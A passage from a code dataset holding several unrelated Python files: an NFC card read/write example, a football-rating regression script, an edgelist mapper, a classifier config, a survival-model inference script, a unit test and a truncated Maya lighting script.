b\"\\xFE\\xED\\xBE\\xEF\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\n# Write 16 byte to block 4.\npn532.mifare_classic_write_block(4, data)\n\n# Read block\nprint(\n \"Wrote to block 4, now trying to read that data:\",\n [hex(x) for x in pn532.mifare_classic_read_block(4)],\n)","repo_name":"jimsio/hoorch","sub_path":"rework_mifare_readwrite.py","file_name":"rework_mifare_readwrite.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"31950418298","text":"import pandas as pd\nfrom sklearn.linear_model import RidgeCV, Ridge, Lasso\nimport numpy as np\nfrom datetime import datetime\nfrom scipy.optimize import minimize\nfrom random import random\n\ndef get_team_ranks(teams, coefs):\n\n ranks = (-coefs).argsort()\n\n for i in range(len(team_list)):\n print (i+1, teams[ranks[i]], coefs[ranks[i]])\n\ndef model_pred(model, games):\n games = np.asarray(games)\n return model.predict(games)\n\ndef calculate_ridge(Xs, ys, alpha):#\n # print (\"rolling\", len(Xs), len(ys))\n # print (Xs)\n # print(ys)\n Xs = np.asarray(Xs)\n Ys = np.asarray(ys)\n # Ys = Ys.reshape((Ys.shape[0], 1))\n # print (Xs)\n # print (Ys)\n # print (Xs.shape, Ys.shape)\n clf = Ridge(alpha=alpha, fit_intercept=True).fit(Xs, Ys)\n return clf\n\n\ndef get_inverse_sup_and_tot(sup_goal, tot_goal, sup_grid, tot_grid, sup_value_grid, tot_value_grid):\n new_grid = np.abs(sup_grid - sup_goal) + np.abs(tot_grid - tot_goal) + np.abs(sup_value_grid - sup_goal) / 100 + np.abs(\n tot_value_grid - tot_goal) / 100 + random() / 10000000\n\n cell = np.where(new_grid == new_grid.min())\n print(new_grid.min())\n print(np.abs(sup_grid - sup_goal)[cell], np.abs(tot_grid - tot_goal)[cell], np.abs(sup_value_grid - sup_goal)[cell], np.abs(tot_value_grid - tot_goal)[cell])\n if sup_value_grid[cell] == 0.79 and tot_value_grid[cell] == 3.16:\n pass\n i = 0\n return sup_value_grid[cell], tot_value_grid[cell]\n\nclass BetMaker:\n def __init__(self):\n self.hc_bets = 0\n self.ou_bets = 0\n self.hc_th = 0.25\n self.ou_th = 0.25\n self.hc_pl = 0\n self.ou_pl = 0\n\nimport pickle\n\nfolder = \"op_data/MLS/\"\nfile = \"MLS2021.csv\"\n\nsup_estimator = pickle.load(open(folder + \"ML_models/sup_estimator_pre_lin_5.pkl\", 'rb'))\ntot_estimator = pickle.load(open(folder + \"ML_models/tot_estimator_pre_lin_5.pkl\", 'rb'))\n\nsup_list = []\ntot_list = []\nsup_value_list = []\ntot_value_list = []\nfor s in np.arange(-80, 81):\n #print(s)\n sup_temp = []\n tot_temp = []\n sup_value_temp = []\n tot_value_temp = []\n for t in np.arange(200, 501):\n sup = s / 100\n tot = t / 100\n\n\n\n value = sup_estimator.predict(np.asarray([[sup, tot, abs(sup), sup if sup > 0 else 0, -sup if sup <0 else 0]]))[0]\n value2 = tot_estimator.predict(np.asarray([[sup, tot, abs(sup), sup if sup > 0 else 0, -sup if sup <0 else 0]]))[0]\n\n sup_temp.append(value)\n tot_temp.append(value2)\n sup_value_temp.append(sup)\n tot_value_temp.append(tot)\n\n sup_list.append(sup_temp)\n tot_list.append(tot_temp)\n sup_value_list.append(sup_value_temp)\n tot_value_list.append(tot_value_temp)\n\nsup_list = np.asarray(sup_list)\ntot_list = np.asarray(tot_list)\nsup_value_list = np.asarray(sup_value_list)\ntot_value_list = np.asarray(tot_value_list)\n\nprint (\"build grids\")\n\n\ndf = pd.read_csv(folder + \"fit/\" + file)\n\ndf[\"sup_per_goal\"] = (df[\"home_underlying\"] - df[\"away_underlying\"])/(df[\"home_underlying\"] + df[\"away_underlying\"])\ndf[\"ex_total\"] = (df[\"home_underlying\"] + df[\"away_underlying\"])\n\n#need to roll x games/days\n#need to build_features\n\n#date, teama, teamb, scorea, scoreb, sup per goal, ex total\n\ngames_details = []\n\nfor x, row in df.iterrows():\n sup, tot = get_inverse_sup_and_tot(row[\"sup_per_goal\"], row[\"ex_total\"], sup_list, tot_list, sup_value_list, tot_value_list)\n print (row[\"sup_per_goal\"], row[\"ex_total\"], sup, tot )\n # this_row = [row[\"Date\"],\n # row[\"Time\"],\n # row[\"HomeTeam\"],\n # row[\"AwayTeam\"],\n # row[\"FTHG\"],\n # row[\"FTAG\"],\n # row[\"AHh\"],\n # row[\"AvgAHH\"],\n # row[\"AvgAHA\"],\n # row[\"Avg>2.5\"],\n # row[\"Avg<2.5\"],\n # row[\"sup_per_goal\"],\n # row[\"ex_total\"],\n # sup[0],\n # tot[0]] #row[\"home_underlying\"], row[\"away_underlying\"]]\n\n this_row =[row[\"date\"],\n \"\", # row[\"Time\"],\n row[\"home_team\"],\n row[\"away_team\"],\n row[\"home_score\"],\n row[\"away_score\"],\n row[\"sup_per_goal\"],\n row[\"ex_total\"],\n sup[0],\n tot[0]]\n\n print (this_row)\n games_details.append(this_row)\n\n#print (games_details)\n\nteam_list = []\nfor game in games_details:\n if game[2] not in team_list:\n team_list.append(game[2])\n if game[3] not in team_list:\n team_list.append(game[3])\n\n\n\ndef run_league(args, should_print=False, write_csv=False):\n\n bm = BetMaker()\n total_adjust = [0] * len(team_list)\n sup_adjust = [0] * len(team_list)\n\n csv_rows = []\n rolling_game_list = []\n rolling_game_list2 = []\n rolling_y_list = []\n rolling_y_list_2 = []\n next_fixtures_list = []\n\n start_date = None\n the_alpha = 0.001\n game_carry = 0.0125\n required_games = 50\n the_alpha = args[0]\n required_games = int(args[1])\n differences = []\n differences2 = []\n for game in games_details:\n\n # date_as_dt = datetime.strptime(game[0], \"%d/%m/%Y\")\n\n if True:#date_as_dt < datetime(2022, 3, 2):\n if game[0] != start_date and len(rolling_game_list) > required_games:\n #trigger calcs\n\n model = calculate_ridge(rolling_game_list, rolling_y_list, the_alpha)\n model2 = calculate_ridge(rolling_game_list2, rolling_y_list_2, the_alpha)\n # if should_print:\n # print (\"ha\", model.coef_[-1])\n # get_team_ranks(team_list, model.coef_)\n\n start_date = game[0]\n\n for game2 in games_details:\n if game2[0] == start_date:\n fake_row = [0] * (len(team_list)) #one for ha\n fake_row_2 = [0] * (len(team_list)) # one for ha\n home_ind = team_list.index(game2[2])\n away_ind = team_list.index(game2[3])\n fake_row[home_ind] = 1\n fake_row[away_ind] = -1\n #fake_row[-1] = 1\n\n fake_row_2[home_ind] = 1\n fake_row_2[away_ind] = 1\n # fake_row_2[-1] = -1\n\n predicted_value = model_pred(model, [fake_row])[0] + sup_adjust[home_ind] - sup_adjust[away_ind]\n predicted_value_2 = model_pred(model2, [fake_row_2])[0] + total_adjust[home_ind] + total_adjust[\n away_ind]\n actual_sup_prd = sup_estimator.predict(np.asarray([[predicted_value,\n predicted_value_2,\n abs(predicted_value),\n predicted_value if predicted_value > 0 else 0,\n -predicted_value if predicted_value < 0 else 0]]))[0]\n actual_tot_prd = \\\n tot_estimator.predict(np.asarray([[predicted_value,\n predicted_value_2,\n abs(predicted_value),\n predicted_value if predicted_value > 0 else 0,\n -predicted_value if predicted_value < 0 else 0]]))[0]\n\n\n\n\n if should_print:\n print (game2[0], \",\",\n game2[1], \",\",\n game2[2], \",\",\n game2[3], \",\",\n game2[4], \",\",\n game2[5], \",\",\n predicted_value, \",\",\n predicted_value_2, \",\",\n actual_sup_prd, \",\",\n actual_tot_prd, \",\",\n game2[-2], \",\",\n game2[-1], \",\",\n game2[-4], \",\",\n game2[-3])\n # print (model.coef_[home_ind], model.coef_[away_ind], model.intercept_)\n\n\n # sup update\n if game2[4] + game2[5] == 0:\n sup_adjust[home_ind] = 0\n sup_adjust[away_ind] = 0\n else:\n sup_adjust[home_ind] = ((game2[4] - game2[5]) / (game2[4] + game2[5]) - game2[\n -4]) * game_carry\n sup_adjust[away_ind] = ((-game2[4] + game2[5]) / (game2[4] + game2[5]) + game2[\n -4]) * game_carry\n\n # tot_update\n total_adjust[home_ind] = ((game2[4] + game2[5]) - game2[-3]) * game_carry\n total_adjust[away_ind] = ((game2[4] + game2[5]) - game2[-3]) * game_carry\n\n fake_row = [0] * (len(team_list)) # one for ha\n fake_row_2 = [0] * (len(team_list)) # one for ha\n home_ind = team_list.index(game[2])\n away_ind = team_list.index(game[3])\n fake_row[home_ind] = 1\n fake_row[away_ind] = -1\n\n fake_row_2[home_ind] = 1\n fake_row_2[away_ind] = 1\n\n rolling_game_list.append(fake_row)\n rolling_game_list2.append(fake_row_2)\n rolling_y_list.append(game[-2])\n rolling_y_list_2.append(game[-1])\n rolling_y_list = rolling_y_list[-(required_games + 1):]\n rolling_y_list_2 = rolling_y_list_2[-(required_games + 1):]\n rolling_game_list = rolling_game_list[-(required_games +1 ):]\n rolling_game_list2 = rolling_game_list2[-(required_games + 1):]\n\n model = calculate_ridge(rolling_game_list, rolling_y_list, the_alpha)\n model2 = calculate_ridge(rolling_game_list2, rolling_y_list_2, the_alpha)\n\n rating_dict = {}\n print (\"******************\")\n for x, team in enumerate(team_list):\n print (team, model.coef_[x] + sup_adjust[x], model2.coef_[x] + total_adjust[x])\n rating_dict[team] = {\"sup\": model.coef_[x] + sup_adjust[x],\n \"tot\": model2.coef_[x] + total_adjust[x]}\n\n print (\"sup int\", model.intercept_)\n print(\"tot int\", model2.intercept_)\n rating_dict[\"ints\"] = {\"sup\": model.intercept_,\n \"tot\": model2.intercept_}\n import json\n with open(folder + \"ratings/ratings.json\", \"w\") as outfile:\n json_object = json.dump(rating_dict, outfile)\n return None\n\n#optim = minimize(run_league, np.asarray([1, 40]), method=\"BFGS\")\n\n#print (optim)\n\nrun_league([0.0000001, 50], should_print=True, write_csv=True)\n","repo_name":"BarneyThePD/footything","sub_path":"rolling_regression_alt_5_from_oddsportal.py","file_name":"rolling_regression_alt_5_from_oddsportal.py","file_ext":"py","file_size_in_byte":11199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"6584202406","text":"#!/usr/bin/env python3\nimport argparse\nimport tempfile\nimport os\nimport sys\nfrom typing import * # pylint: disable=wildcard-import,unused-wildcard-import\n\nimport shelve\n\n\ndef parse_args() -> argparse.Namespace:\n parser = argparse.ArgumentParser(\n description=\"Map the entities and the relations of an edgelist\"\n )\n parser.add_argument(\"edgelist\", help=\"Path of the edgelist file\")\n parser.add_argument(\n \"-em\",\n \"--ent-map\",\n default=\"entities_map.tsv\",\n help=\"Output path of the mapping for entities\",\n )\n parser.add_argument(\n \"-rm\",\n \"--rel-map\",\n default=\"relations_map.tsv\",\n help=\"Output path of the mapping for relations\",\n )\n parser.add_argument(\n \"-me\",\n \"--mapped-edgelist\",\n default=\"mapped_edgelist.tsv\",\n help=\"Output path of the mapped edgelist\",\n )\n return parser.parse_args()\n\n\ndef normalize_args(args: argparse.Namespace) -> None:\n args.edgelist = os.path.realpath(args.edgelist)\n args.ent_map = os.path.realpath(args.ent_map)\n args.rel_map = os.path.realpath(args.rel_map)\n args.mapped_edgelist = os.path.realpath(args.mapped_edgelist)\n\n\ndef validate_args(args: argparse.Namespace) -> None:\n if not os.path.isfile(args.edgelist):\n print(\"The edgelist file does not exists\")\n sys.exit(1)\n if not os.path.isfile(args.ent_map):\n print(\"The entities mapping file does not exists\")\n sys.exit(1)\n if not os.path.isfile(args.rel_map):\n print(\"The relations mapping file does not exists\")\n sys.exit(1)\n\n\ndef main(args: argparse.Namespace) -> None:\n edgelist_path = args.edgelist\n ent_map_path = args.ent_map\n rel_map_path = args.rel_map\n el_map_path = args.mapped_edgelist\n\n with tempfile.TemporaryDirectory() as tmp:\n ent_dict_path = os.path.join(tmp, \"ent\")\n rel_dict_path = os.path.join(tmp, \"rel\")\n\n with shelve.open(ent_dict_path) as rel_dict, shelve.open(\n rel_dict_path\n ) as ent_dict:\n print(\"Processing entities mapping\")\n with open(ent_map_path, \"r\") as em_handle:\n for line in em_handle:\n parts = line.rstrip(\"\\n\").split(\"\\t\")\n ent_dict[parts[1]] = parts[0]\n\n print(\"Processing relations mapping\")\n with open(rel_map_path, \"r\") as rm_handle:\n for line in rm_handle:\n parts = line.rstrip(\"\\n\").split(\"\\t\")\n rel_dict[parts[1]] = parts[0]\n\n print(\"Writing the mapped edgelist\")\n os.makedirs(os.path.dirname(el_map_path), exist_ok=True)\n with open(el_map_path, \"w+\") as mel_handle, open(\n edgelist_path, \"r\"\n ) as el_handle:\n for line in el_handle:\n parts = line.rstrip(\"\\n\").split(\"\\t\")\n mel_handle.write(\n ent_dict[parts[0]]\n + \"\\t\"\n + rel_dict[parts[1]]\n + \"\\t\"\n + ent_dict[parts[2]]\n + \"\\n\"\n )\n\n\nif __name__ == \"__main__\":\n try:\n ARGS = parse_args()\n\n normalize_args(ARGS)\n validate_args(ARGS)\n main(ARGS)\n except (KeyboardInterrupt, SystemExit):\n print(\"\\nAborted!\")\n","repo_name":"simonepri/edgelist-mapper","sub_path":"edgelist_mapper/bin/map_edgelist.py","file_name":"map_edgelist.py","file_ext":"py","file_size_in_byte":3388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"41459310054","text":"users = {\n 'niklas': [\n 'computer',\n 'sports'\n ],\n 'luca': [\n 'computer',\n 'science'\n ],\n 'florian': [\n 'politics',\n 'sports'\n ]\n}\n\nthreshold = 2.0\n\ndoc_path = 'docs/'\n\nmodel_path = 'model/'\n\ncategories = [\n 'alt.atheism',\n 'comp.graphics',\n 'comp.os.ms-windows.misc',\n 'comp.sys.ibm.pc.hardware',\n 'comp.sys.mac.hardware',\n 'comp.windows.x',\n # 'misc.forsale',\n 'rec.autos',\n 'rec.motorcycles',\n 'rec.sport.baseball',\n 'rec.sport.hockey',\n 'sci.crypt',\n 'sci.electronics',\n 'sci.med',\n 'sci.space',\n 'soc.religion.christian',\n 'talk.politics.guns',\n 'talk.politics.mideast',\n 'talk.politics.misc',\n 'talk.religion.misc'\n]\n\nnew_categories = {\n 'comp': 'computer',\n 'rec': 'sports',\n 'sci': 'science',\n 'religion': 'religion',\n 'politics': 'politics',\n 'atheism': 'religion'\n}\n","repo_name":"covix/vector-space-model","sub_path":"Assignment01/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":914,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"18449456154","text":"import copy\nimport json\nimport pandas as pd\nimport sys\nimport torch\nimport pytorch_lightning as pl\nimport numpy as np\n\nfrom pathlib import Path\nfrom torch.utils.data import DataLoader\n\nfrom argparse import ArgumentParser\n\nfrom survival_plus_x.data.dataset import GensheimerDatasetInMemory\nfrom survival_plus_x.data.transforms import get_preprocess_transforms\nfrom survival_plus_x.models.survival_plus_unetr import MultitaskPlusUNETR\nfrom survival_plus_x.models.survival_plus_unet import MultitaskPlusUNET\nfrom survival_plus_x.models.multitask import multitask_metrics_from_step_outputs\nfrom survival_plus_x.utils.commandline_params import add_common_args\nfrom survival_plus_x.models.cox_lightning import compute_stratification_logrank_pvalue\n\n\ndef inference_single_sample(args, test_ids, model):\n test_dataset = GensheimerDatasetInMemory(\n image_directories=args.input,\n image_filename=args.img_filename,\n mask_filename=args.mask_filename,\n patient_ids=test_ids,\n outcome_file=args.outcome,\n outcome_file_sep=args.outcome_sep,\n outcome_file_id_column=args.id_col,\n outcome_file_time_column=args.time_col,\n outcome_file_event_column=args.event_col,\n interval_breaks=model.hparams.gensheimer_interval_breaks,\n preprocess_transform=get_preprocess_transforms(list(args.image_size)),\n augmentation_transform=None)\n\n test_loader = DataLoader(\n test_dataset,\n shuffle=False,\n batch_size=args.batch_size,\n num_workers=args.num_workers)\n\n trainer = pl.Trainer(gpus=args.gpus)\n\n test_pred_step_outputs = trainer.predict(\n model,\n dataloaders=test_loader)\n\n return test_pred_step_outputs\n\n\ndef inference_multiple_samples(args, test_ids, model):\n # we have to set up the dataset in the way that initially a larger\n # crop is chosen and then a transform that creates random crops of the\n # actually wanted size\n from monai.transforms import RandSpatialCropSamplesd, Resized, Compose\n\n n_samples = args.n_samples\n aggregation_fn = {\n \"min\": torch.min,\n \"max\": torch.max,\n \"mean\": torch.mean,\n \"median\": torch.median\n }[args.sample_aggregation]\n\n random_crops_transform = Compose([\n RandSpatialCropSamplesd(\n keys=[\"img\", \"mask\"],\n roi_size=args.image_size,\n random_size=False,\n random_center=True,\n num_samples=n_samples\n ),\n Resized(\n keys=[\"img\", \"mask\"],\n spatial_size=args.image_size)\n ])\n\n test_dataset = GensheimerDatasetInMemory(\n image_directories=args.input,\n image_filename=args.img_filename,\n mask_filename=args.mask_filename,\n patient_ids=test_ids,\n outcome_file=args.outcome,\n outcome_file_sep=args.outcome_sep,\n outcome_file_id_column=args.id_col,\n outcome_file_time_column=args.time_col,\n outcome_file_event_column=args.event_col,\n interval_breaks=model.hparams.gensheimer_interval_breaks,\n preprocess_transform=get_preprocess_transforms(\n (1.25 * np.array(args.image_size)).astype(int).tolist()), # increase spatial size so we can random crop\n augmentation_transform=random_crops_transform)\n\n test_loader = DataLoader(\n test_dataset,\n shuffle=False,\n batch_size=args.batch_size,\n num_workers=args.num_workers)\n\n # now each batch the data loader produces is a list of dicts of length n_samples\n # for which we have to make predictions and boil down results to a single dict\n # per batch\n\n step_outputs = []\n\n surv_heads = model.hparams.heads_to_use\n print(\"models survival heads\", surv_heads)\n with torch.no_grad():\n for batch_idx, batch in enumerate(test_loader):\n # batch is now a list of dicts, one dict for each sample\n # and we have to aggregate over all samples to make a final\n # prediction for each patient in the batch\n aggregated_step_result = {}\n for sample_idx, sample_dict in enumerate(batch):\n print(\n f\"\\nPredicting for Batch {batch_idx+1}, sample {sample_idx + 1}\\n\")\n\n # results for the first sample of the batch patients\n # has keys 'survival' and 'segmentation' where\n # survival is another dict for each head containing the keys 'patient', 'label' and 'prediction'\n sample_result = model.predict_step(\n sample_dict, batch_idx=None) # batch_idx is not used anyway\n # print(sample_result.keys())\n # print(\"sample_result['survival'].keys()\",\n # sample_result[\"survival\"].keys())\n\n if sample_idx == 0:\n for head in surv_heads: # sample_result[\"survival\"]:\n aggregated_step_result[head] = dict()\n # copy all non-prediction keys\n for k in sample_result[\"survival\"][head].keys():\n if \"prediction\" in k:\n continue\n aggregated_step_result[head][k] = sample_result[\"survival\"][head][k]\n\n aggregated_step_result[head][\"sample_predictions\"] = [\n sample_result[\"survival\"][head][\"prediction\"].detach()]\n\n else:\n for head in surv_heads: # sample_result[\"survival\"]:\n aggregated_step_result[head][\"sample_predictions\"].append(\n sample_result[\"survival\"][head][\"prediction\"].detach())\n\n # stack all the predictions we aggregated along the second dimension,\n # so the output has shape B, n_samples, n_predictions for each head\n for head in surv_heads:\n aggregated_step_result[head][\"sample_predictions\"] = torch.stack(\n aggregated_step_result[head][\"sample_predictions\"], dim=1)\n\n # now final aggregation\n for head in surv_heads:\n aggregated = aggregation_fn(\n aggregated_step_result[head][\"sample_predictions\"], dim=1)\n\n # NOTE: for min, max and median, torch calls return a tuple of\n # values and indices if dim= argument is passed (but not for mean)\n if not isinstance(aggregated, torch.Tensor):\n assert len(aggregated) == 2\n vals, _ = aggregated\n aggregated = vals\n aggregated_step_result[head][\"sample_predictions_std\"] = torch.std(\n aggregated_step_result[head][\"sample_predictions\"],\n dim=1,\n unbiased=False\n )\n\n aggregated_step_result[head][\"prediction\"] = aggregated\n\n step_outputs.append(dict(survival=aggregated_step_result))\n\n return step_outputs\n\n\ndef main(args):\n pl.seed_everything(args.seed)\n test_ids = pd.read_csv(args.test_id_file,\n header=None).values.squeeze().tolist()\n\n if args.vit_or_cnn == \"vit\":\n cls = MultitaskPlusUNETR\n\n elif args.vit_or_cnn == \"cnn\":\n cls = MultitaskPlusUNET\n\n model = cls.load_from_checkpoint(\n checkpoint_path=args.ckpt_file)\n model.eval()\n model.freeze()\n print(f\"Loaded trained model from checkpoint {args.ckpt_file}.\")\n\n if args.n_samples > 1:\n test_pred_step_outputs = inference_multiple_samples(\n args, test_ids, model)\n elif args.n_samples == 1:\n test_pred_step_outputs = inference_single_sample(\n args, test_ids, model)\n else:\n raise ValueError(\n f\"n_samples must be >= 1, not \"\n f\"{args.n_samples}\")\n\n # NOTE: information of variance among multiple predictions gets lost here\n # since only the \"prediction\" keys are taken into account when evaluating\n # metrics and returning test_pred\n # TODO: maybe write out the step_outputs in some meaningful way as well?\n\n test_metrics, test_pred = multitask_metrics_from_step_outputs(\n [d[\"survival\"] for d in test_pred_step_outputs],\n task_names=model.hparams.heads_to_use,\n timepoints_cindex=model.hparams.timepoints_cindex,\n timepoints_brier=model.hparams.timepoints_brier,\n training_labels=model.hparams.training_labels,\n gensheimer_interval_breaks=model.hparams.gensheimer_interval_breaks\n )\n\n # if inference_multiple_samples -> also add the standard deviations for the predictions\n # to the test_pred dataframe\n if args.n_samples > 1:\n for head in test_pred:\n stds = torch.cat([d['survival'][head]['sample_predictions_std']\n for d in test_pred_step_outputs])\n #pats = [d['survival'][head]['patient']]\n stds_dict = {}\n for i in range(stds.shape[1]):\n stds_dict[f'std_prediction_{i}'] = stds[:, i]\n stds_dict = pd.DataFrame(stds_dict)\n test_pred[head] = pd.concat([test_pred[head], stds_dict], axis=1)\n\n print()\n print(f\"Storing test predictions to {args.output_dir}\")\n for head in test_pred:\n pred_df = test_pred[head]\n pred_df.set_index(\"patient\").to_csv(\n args.output_dir / f\"{head}_predictions.csv\")\n\n for head in test_metrics:\n metrics = pd.DataFrame(test_metrics[head], index=[0])\n\n # stratification cutoff for cox model only\n # TODO: can we use stratification cutoff for other losses?\n if head == \"cox\":\n if args.stratification_cutoff_cox is None:\n print(\"Note: No stratification cutoff was provided. Will \"\n \"determine it as median of predictions. This might \"\n \"not be intended for data other than the training \"\n \"data! If you are not using the training data now \"\n \"you should determine the cutoff from that beforehand!\")\n stratification_cutoff = np.median(\n test_pred[head]['prediction'])\n else:\n stratification_cutoff = args.stratification_cutoff_cox\n\n test_logrank_pval = compute_stratification_logrank_pvalue(\n test_pred[head], cutoff=stratification_cutoff)\n\n metrics['stratification_cutoff'] = stratification_cutoff\n metrics['stratification_logrank_pval'] = test_logrank_pval\n\n print()\n print(f\"{head.capitalize()} metrics (storing to {args.output_dir})\")\n print(metrics)\n metrics.to_csv(args.output_dir / f\"{head}_metrics.csv\", index=False)\n\n return 0\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser(\"Inference\")\n parser = add_common_args(parser)\n parser.add_argument(\n '--ckpt_file',\n type=str,\n help='Full path to a checkpoint file of the trained model.')\n parser.add_argument(\n '--output_dir',\n type=str,\n default=None)\n parser.add_argument(\n '--gpus',\n type=int,\n default=0)\n parser.add_argument(\n '--stratification_cutoff_cox',\n type=float,\n help=\"Cutoff value applied to the test predictions to divide into low and high risk groups.\")\n parser.add_argument(\n '--n_samples',\n type=int,\n default=1,\n help=\"Number of random crops to create per patient and from which to make a final prediction\"\n )\n parser.add_argument(\n '--sample_aggregation',\n type=str,\n choices=[\"mean\", \"median\", \"min\", \"max\"],\n default=\"mean\"\n )\n parser.add_argument(\n \"--vit_or_cnn\",\n type=str,\n choices=[\"vit\", \"cnn\"],\n #default=\"vit\"\n )\n\n # parser.add_argument('--plot_predictions',\n # action=\"store_true\",\n # default=False,\n # help=\"Flag to decide whether predictions for each\"\n # \" patient should be plotted after training.\")\n\n args = parser.parse_args()\n print(f\"parsed args are\\n{args}\")\n\n if args.output_dir is None:\n args.output_dir = \"./cox_vit/inference\"\n if not isinstance(args.output_dir, Path):\n args.output_dir = Path(args.output_dir)\n\n if not args.output_dir.is_dir():\n args.output_dir.mkdir(parents=True)\n else:\n raise ValueError(f\"Output_dir {args.output_dir} already exists!\")\n\n # storing the commandline arguments to a json file\n with open(args.output_dir / \"commandline_args.json\", 'w') as of:\n # pathlib objects cant be serialized so we convert to string\n storage_args = vars(copy.deepcopy(args))\n storage_args[\"output_dir\"] = str(\n storage_args[\"output_dir\"])\n\n json.dump(storage_args, of, indent=2)\n\n args.input = [Path(inp) for inp in args.input]\n\n retval = main(args)\n sys.exit(retval)\n","repo_name":"oncoray/multitask-hnscc","sub_path":"scripts/multitask/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":13005,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"92"} +{"seq_id":"72783039019","text":"from unittest.mock import Mock\n\nfrom _sadm.devops.wapp.view import index\n\ndef test_handle(devops_wapp):\n\twapp = devops_wapp()\n\twith wapp.mock() as ctx:\n\t\tbup = Mock()\n\t\tbup._repos = index._repos\n\t\ttry:\n\t\t\trepos = object()\n\t\t\tindex._repos = Mock(return_value = repos)\n\t\t\tindex.handle(user = None)\n\t\tfinally:\n\t\t\tdel index._repos\n\t\t\tindex._repos = bup._repos\n\t\tctx.tpl.parse.assert_called_with('index', repos = repos, user = None)\n","repo_name":"jrmsdev/pysadm","sub_path":"t/devops/devops_wapp_view_index_test.py","file_name":"devops_wapp_view_index_test.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"92"} +{"seq_id":"41234490612","text":"import maya.cmds as cmds\n\nvertexlist = cmds.ls(sl=True, fl=True)\nmesh = vertexlist[0].split('.')[0]\ncmds.select(mesh)\nmeshShape = cmds.listRelatives(shapes=True)[0]\norig = cmds.duplicate(mesh, name=mesh + 'Orig')\ntodelete = cmds.ls(sl=True)\ncpv = cmds.rename(meshShape, mesh + 'CPVShape')\ntomove = cmds.listRelatives(shapes=True)[0]\ncmds.parent(tomove, mesh, shape=True, relative=True)\ncmds.delete(todelete)\norig = orig[0] + 'Shape'\n\n# create input graph\n\ncmds.select(orig)\natpc = soup().create('arrayToPointColor')[0]\ncmds.connectAttr(atpc + '.outGeometry', cpv + '.inMesh', force=True)\ncmds.setAttr(atpc + '.solidAlpha', 1)\ncmds.select(orig)\ntta = soup().create('textureToArray')[0]\ncmds.connectAttr(tta + '.outRgbaPP', atpc + '.inRgbaPP')\ncmds.setAttr(tta + '.accurateSampling', 1)\ntex = cmds.shadingNode('surfaceShader', asTexture=True, name=mesh + 'CPVcolor')\ncmds.connectAttr(tex + '.outColor', tta + '.inColor')\ncmds.setAttr(orig + '.intermediateObject', 1)\ncmds.setAttr(cpv + '.displayColors', 1)\n\n# create output graph\n\ncmds.select(mesh)\nsoup().create('pointAttributeToArray')\narray = cmds.ls(sl=True)[0]\nsoup().create('rgbaToColorAndAlpha')\nrgba = cmds.ls(sl=True)[0]\nsoup().create('pointCloudToMesh')\nbakemesh = cmds.ls(sl=True)[0]\ncmds.polyCube(name=mesh + 'colorBake')\ncolorBake = cmds.ls(sl=True)[0]\n\n# set nodes attributes\ncmds.setAttr(array + '.pointColor', 1)\ncmds.setAttr(bakemesh + '.normal', 0)\ncmds.setAttr(bakemesh + '.rgba', 0)\ncmds.setAttr(bakemesh + '.map', 0)\ncmds.setAttr(bakemesh + '.position', 1)\ncmds.setAttr(colorBake + '.visibility', 0)\n\n# connect nodes\ncmds.connectAttr(array + '.outRgbaPP', rgba + '.inRgbaPP', force=True)\ncmds.connectAttr(rgba + '.outRgbPP', bakemesh + '.inPositionPP', force=True)\ncmds.connectAttr(bakemesh + '.outMesh', colorBake + '.inMesh', force=True)\n\n# 1 locator per color\n\nvertexNo = [x.replace(x.split('.')[0], colorBake) for x in vertexlist]\ncmds.select(vertexNo)\nvertexConstraint_SOuP().main()\n\n# 1 locator per light\n\ncmds.select(vertexlist)\nvertexConstraint_SOuP().main()\nlocs = cmds.ls(sl=True, fl=True)\n\n# Controler\n\nctrl = cmds.spaceLocator(name=mesh + '_Light_CTRL')[0]\ncmds.move(0, 5, 0)\ncmds.addAttr(longName='lightsDisplay', attributeType='bool', defaultValue=True, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='lightsScale', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='targetsDisplay', attributeType='bool', defaultValue=True, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='targetsScale', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='locatorsDisplay', attributeType='bool', defaultValue=False, hidden=False, writable=True,keyable=True)\n# cmds.addAttr(longName='IESfile', dataType=\"string\", hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='NormalOffset', attributeType='float', hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='Intensity', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='Exposure', attributeType='float', defaultValue=12, hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='Spread', attributeType='float', defaultValue=1, hidden=False, writable=True, keyable=True)\n\ncmds.addAttr(longName='DiffuseContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='SpecularContribution', min=0,max=1, attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='SSSContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='IndirectContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\ncmds.addAttr(longName='VolumeContribution', min=0,max=1,attributeType='float', defaultValue=1, hidden=False, writable=True,keyable=True)\n\ncmds.addAttr(longName='EmitDiffuse', attributeType='bool', defaultValue=True, hidden=False, writable=True, keyable=True)\ncmds.addAttr(longName='EmitSpec', attributeType='bool', defaultValue=True, hidden=False, writable=True, keyable=True)\n# cmds.setAttr(ctrl+'.IESfile',\"IES profile here...\",type=\"string\")\n\nfor vtx in locs:\n id = 